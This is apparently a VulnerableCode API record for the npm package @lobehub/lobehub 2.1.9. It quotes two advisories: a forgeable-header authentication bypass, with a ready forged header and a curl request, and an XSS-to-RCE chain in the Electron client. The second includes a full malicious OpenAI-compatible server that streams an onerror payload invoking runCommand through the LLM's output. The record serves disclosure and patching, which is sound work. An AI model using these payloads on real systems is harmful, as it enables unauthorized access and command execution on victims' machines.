Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1018167?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1018167?format=api", "purl": "pkg:npm/%40lobehub/lobehub@2.1.9", "type": "npm", "namespace": "@lobehub", "name": "lobehub", "version": "2.1.9", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89459?format=api", "vulnerability_id": "VCID-44mw-hyky-hqcp", "summary": "LobeHub: Unauthenticated authentication bypass on `webapi` routes via forgeable `X-lobe-chat-auth` header\n# Summary\n\nThe `webapi` authentication layer trusts a client-controlled `X-lobe-chat-auth` header that is only XOR-obfuscated, not signed or otherwise authenticated. Because the XOR key is hardcoded in the repository, an attacker can forge arbitrary auth payloads and bypass authentication on protected `webapi` routes.\n\nAffected routes include:\n- `POST /webapi/chat/[provider]`\n- `GET /webapi/models/[provider]`\n- `POST /webapi/models/[provider]/pull`\n- `POST /webapi/create-image/comfyui`\n\n## Details\n\nThe frontend creates `X-lobe-chat-auth` by XOR-obfuscating JSON with the static key `LobeHub ยท LobeHub`, and the backend reverses that operation and treats the decoded JSON as trusted authentication data.\n\nThe backend then accepts any truthy `apiKey` field in that decoded payload as sufficient authentication. No real API key validation is performed in this path.\n\nAs a result, an unauthenticated attacker can forge payloads such as:\n\n```json\n{\"apiKey\":\"x\"} \n```\n\nor \n\n``` {\"userId\":\"victim-user-123\",\"apiKey\":\"x\"} ```\n\nand access webapi routes as an authenticated user.\n\nConfirmed PoC\nThe following forged header was generated directly from the published XOR key using payload {\"apiKey\":\"x\"}:\n\n\n``` X-lobe-chat-auth: N00DFSE+B1ngjQI0TR8= ```\n\nThat header decodes server-side to:\n\n``` {\"apiKey\":\"x\"}```\n\nA simple request is:\n\n``` curl 'https://TARGET/webapi/models/openai' \\\n -H 'X-lobe-chat-auth: N00DFSE+B1ngjQI0TR8=' ``` \n\nIf the deployment has OPENAI_API_KEY configured, the request should succeed without a real login and return the provider model list.\n\nA forged impersonation payload also works conceptually:\n\n``` {\"userId\":\"victim-user-123\",\"apiKey\":\"x\"} ``` \n\n### Impact\nThis is an unauthenticated authentication bypass.\n\nAn attacker can:\n\n1. access protected webapi routes without a valid session\n2. spend the deployment's server-side model provider credentials when env keys like OPENAI_API_KEY are configured\n3. impersonate another user's userId for routes that load per-user provider configuration\n4. invoke privileged backend model operations such as chat, model listing, model pulls, and ComfyUI image generation\n\n### Root Cause\nThe core issue is trusting unsigned client-supplied auth data:\n\n1. the auth header is only obfuscated, not authenticated\n2. the obfuscation key is hardcoded and recoverable from the repository\n3. the decoded apiKey field is treated as sufficient authentication even though it is never validated in this code path\n4. Suggested Remediation\n5. Stop treating X-lobe-chat-auth as an authentication token.\n6. Remove the apiKey truthiness check as an auth decision.\n7. Require a real server-validated session, OIDC token, or validated API key for all protected webapi routes.\n8. If a client payload is still needed, sign it server-side with an HMAC or replace it with a normal session-bound backend lookup.\n9. Affected Products\n\nEcosystem: npm\n\nPackage name: @lobehub/lobehub\nAffected versions: <= 2.1.47\nPatched versions: 2.1.48\n\nSeverity\nModerate\nVector String\nCVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L\n\nWeaknesses\nCWE-287: Improper Authentication\nCWE-345: Insufficient Verification of Data Authenticity\nCWE-290: Authentication Bypass by Spoofing", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39411", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07581", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07511", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07559", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07572", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39411" }, { "reference_url": "https://github.com/lobehub/lobehub", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/lobehub/lobehub" }, { "reference_url": "https://github.com/lobehub/lobehub/commit/3327b293d66c013f076cbc16cdbd05a61a3d0428", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T20:14:34Z/" } ], "url": "https://github.com/lobehub/lobehub/commit/3327b293d66c013f076cbc16cdbd05a61a3d0428" }, { "reference_url": "https://github.com/lobehub/lobehub/pull/13535", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T20:14:34Z/" } ], "url": "https://github.com/lobehub/lobehub/pull/13535" }, { "reference_url": "https://github.com/lobehub/lobehub/releases/tag/v2.1.48", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T20:14:34Z/" } ], "url": "https://github.com/lobehub/lobehub/releases/tag/v2.1.48" }, { "reference_url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-5mwj-v5jw-5c97", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T20:14:34Z/" } ], "url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-5mwj-v5jw-5c97" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39411", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39411" }, { "reference_url": "https://github.com/advisories/GHSA-5mwj-v5jw-5c97", "reference_id": "GHSA-5mwj-v5jw-5c97", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5mwj-v5jw-5c97" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110640?format=api", "purl": "pkg:npm/%40lobehub/lobehub@2.1.48", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540lobehub/lobehub@2.1.48" } ], "aliases": [ "CVE-2026-39411", "GHSA-5mwj-v5jw-5c97" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-44mw-hyky-hqcp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93769?format=api", "vulnerability_id": "VCID-6b8u-duqs-qyc6", "summary": "LobeHub has a Cross-Site Scripting issue that escalates to Remote Code Execution\n### Summary\nThe vulnerability was automatically discovered by an ai agent and then manually verified.\n\nLobeChat's message rendering mechanism has a stored cross-site scripting (XSS) vulnerability. Combined with the Electron main process's exposed insecure IPC interface, attackers can construct malicious payloads to achieve an attack chain from XSS to remote code execution (RCE).\n\nThe LobeChat team verified this vulnerability in lobehub v2.1.23, and it also exists in the latest version.\n\n### Details\nWhen LobeChat processes custom tags in the Render process of `src/features/Portal/Artifacts/Body/Renderer/index.tsx`, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering.\n\n```typescript\nconst Renderer = memo<{ content: string; type?: string }>(({ content, type }) => {\n switch (type) {\n case 'application/lobe.artifacts.react': {\n return <ReactRenderer code={content} />;\n }\n\n case 'image/svg+xml': {\n return <SVGRender content={content} />;\n }\n\n case 'application/lobe.artifacts.mermaid': {\n return <Mermaid variant={'borderless'}>{content}</Mermaid>;\n }\n\n case 'text/markdown': {\n return <Markdown style={{ overflow: 'auto' }}>{content}</Markdown>;\n }\n\n default: {\n return <HTMLRenderer htmlContent={content} />;\n }\n }\n});\n\nexport default Renderer;\n```\n\nIf an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side.\n\nAdditionally, Lobechat's Electron main process exposes an IPC interface called `runCommand`, used to invoke system commands. This interface allows arbitrary command execution and does not filter the `command` parameter. Therefore, if an attacker can obtain a handle to `window.parent.electronAPI` via XSS and call the `runCommand` method of the IPC, the `ipcMain` process can execute arbitrary system commands with the current user's privileges.\n\n```typescript\n @IpcMethod()\n async handleRunCommand({\n command,\n description,\n run_in_background,\n timeout = 120_000,\n }: RunCommandParams): Promise<RunCommandResult> {\n ...\n const childProcess = spawn(shellConfig.cmd, shellConfig.args, {\n env: process.env,\n shell: false,\n });\n ...\n }\n```\n\n### PoC\nThe attacker launched a malicious OpenAI gateway on port 5001\n\n```python\nfrom flask import Flask, Response, request, jsonify\nimport time\nimport json\n\napp = Flask(__name__)\nfake_api_key = \"sk-test\"\n\n@app.route('/v1/chat/completions', methods=['POST', 'OPTIONS'])\ndef chat_completions():\n if request.method == 'OPTIONS':\n return Response(status=200, headers={\n 'Access-Control-Allow-Origin': '*',\n 'Access-Control-Allow-Headers': '*'\n })\n\n # Check for API Key\n auth_header = request.headers.get('Authorization')\n print(auth_header)\n if not auth_header or auth_header != f'Bearer {fake_api_key}':\n return jsonify({\"error\": {\"message\": \"Invalid API Key\", \"type\": \"invalid_request_error\", \"code\": \"invalid_api_key\"}}), 401\n\n def generate(): \n payload = \"\"\"\n<lobeArtifact type=\"nebula\">\n<img src=x onerror='window.parent.electronAPI.invoke(\"shellCommand.handleRunCommand\", {command:\"open -a Calculator\"})'>\n</lobeArtifact>\n\"\"\"\n # Split payload into chunks to simulate streaming\n chunks = [payload[i:i+10] for i in range(0, len(payload), 10)]\n \n for chunk in chunks:\n data = {\n \"id\": \"chatcmpl-hpdoger-123\", \n \"object\": \"chat.completion.chunk\", \n \"created\": int(time.time()), \n \"model\": \"gpt-3.5-turbo\", \n \"choices\": [{\n \"index\": 0, \n \"delta\": {\"content\": chunk},\n \"finish_reason\": None\n }]\n }\n yield f\"data: {json.dumps(data)}\\n\\n\"\n time.sleep(0.1)\n \n # End of stream\n final_data = {\n \"id\": \"chatcmpl-hpdoger-123\", \n \"object\": \"chat.completion.chunk\", \n \"created\": int(time.time()), \n \"model\": \"gpt-3.5-turbo\", \n \"choices\": [{\n \"index\": 0, \n \"delta\": {},\n \"finish_reason\": \"stop\"\n }]\n }\n yield f\"data: {json.dumps(final_data)}\\n\\n\"\n yield \"data: [DONE]\\n\\n\"\n\n return Response(generate(), mimetype='text/event-stream', headers={\n 'Access-Control-Allow-Origin': '*', \n 'Access-Control-Allow-Headers': '*'\n })\n\n@app.route('/v1/models', methods=['GET'])\ndef models():\n return jsonify({\n \"object\": \"list\", \n \"data\": [{\n \"id\": \"gpt-3.5-turbo\", \n \"object\": \"model\", \n \"created\": 1677610602, \n \"owned_by\": \"openai\"\n }]\n })\n\nif __name__ == '__main__':\n print(\"Evil OpenAI-compatible server running on http://127.0.0.1:5001\")\n app.run(port=5001, debug=True)\n```\n\nThe victim opens the LobeChat application and configures an LLM Provider, entering the address of the HTTP server provided by the attacker.\n\n<img width=\"2048\" height=\"772\" alt=\"image\" src=\"https://github.com/user-attachments/assets/86fe8f76-d75f-4e23-a2c5-fe29b124c7a7\" />\n\nThe victim was exposed to an arbitrary command execution vulnerability while chatting\n\n<img width=\"2048\" height=\"1036\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0a84171f-ec78-4166-b7ab-298ece6b06b9\" />\n\n### reproduction\nFor attack reproduction, refer to this video. Once the victim configures the attacker's LLM provider endpoint, arbitrary commands can be executed. Here, our demonstration `opens a calculator` in the victim's environment.\n\nhttps://github.com/user-attachments/assets/6383e996-9148-4e88-8e25-90260104368d\n\n### Impact\nAffected LobeChat clients can connect to the attacker's LLM endpoint and trigger arbitrary command execution simply by sending normal conversation messages.\n\n### Patch\nA patch is available at https://github.com/lobehub/lobehub/releases/tag/v2.1.48.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42045", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13362", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13245", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13324", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13367", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42045" }, { "reference_url": "https://github.com/lobehub/lobehub", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/lobehub/lobehub" }, { "reference_url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T19:03:32Z/" } ], "url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42045", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42045" }, { "reference_url": "https://github.com/advisories/GHSA-xq4x-622m-q8fq", "reference_id": "GHSA-xq4x-622m-q8fq", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xq4x-622m-q8fq" } ], "fixed_packages": [], "aliases": [ "CVE-2026-42045", "GHSA-xq4x-622m-q8fq" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6b8u-duqs-qyc6" } ], "fixing_vulnerabilities": [], "risk_score": "3.1", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540lobehub/lobehub@2.1.9" }